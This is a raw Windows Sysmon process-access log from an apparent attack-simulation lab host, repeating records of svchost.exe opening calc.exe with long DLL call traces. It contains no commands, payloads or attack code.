11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361711Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361710Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361709Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361708Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361707Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361706Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361705Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361704Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361703Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361702Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361701Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361700Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361699Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361698Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361697Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361696Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361695Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361694Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361693Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55323132C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361692Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4.dll+2c931|C:\Windows\System32\RPCRT4.dll+2c480|C:\Windows\System32\RPCRT4.dll+1a6bf|C:\Windows\System32\RPCRT4.dll+19d1a|C:\Windows\System32\RPCRT4.dll+19301 10341000x8000000000000000361691Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1040C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|C:\Windows\System32\combase.dll+30478|C:\Windows\System32\combase.dll+2e36b|C:\Windows\System32\combase.dll+2e470|C:\Windows\System32\combase.dll+2e2d4|C:\Windows\System32\combase.dll+5f548|C:\Windows\System32\combase.dll+5efcb|C:\Windows\System32\combase.dll+90555|C:\Windows\System32\combase.dll+8d220|C:\Windows\System32\combase.dll+8d156|C:\Windows\System32\combase.dll+8cdff|C:\Windows\System32\combase.dll+45b17|C:\Windows\System32\combase.dll+a1fe9|C:\Windows\System32\RPCRT4.dll+da15e|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd 10341000x8000000000000000361690Microsoft-Windows-Sysmon/Operationalip-0A000111.attackrange.local-2021-01-28 22:13:28.288{8e433fbf-2a47-6013-6b00-000000001100}55324628C:\Windows\system32\svchost.exe{8e433fbf-3708-6013-b603-000000001100}8876C:\Windows\System32\calc.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+9d154|C:\Windows\System32\RPCRT4.dll+2d2d4|C:\Windows\System32\combase.dll+b8b4b|c:\windows\system32\windows.staterepository.dll+2d7e5|c:\windows\system32\windows.staterepository.dll+1fe25|C:\Windows\System32\RPCRT4.dll+76963|C:\Windows\System32\RPCRT4.dll+da036|C:\Windows\System32\RPCRT4.dll+38299|C:\Windows\System32\combase.dll+a0e93|C:\Windows\System32\RPCRT4.dll+59a8b|C:\Windows\System32\combase.dll+8e663|C:\Windows\System32\combase.dll+8e453|C:\Windows\System32\combase.dll+a4526|C:\Windows\System32\combase.dll+52d7a|C:\Windows\System32\combase.dll+9f6cd|C:\Windows\System32\combase.dll+616ac|C:\Windows\System32\combase.dll+61f11|C:\Windows\System32\combase.dll+636b8|C:\Windows\System32\RPCRT4.dll+548d8|C:\Windows\System32\RPCRT4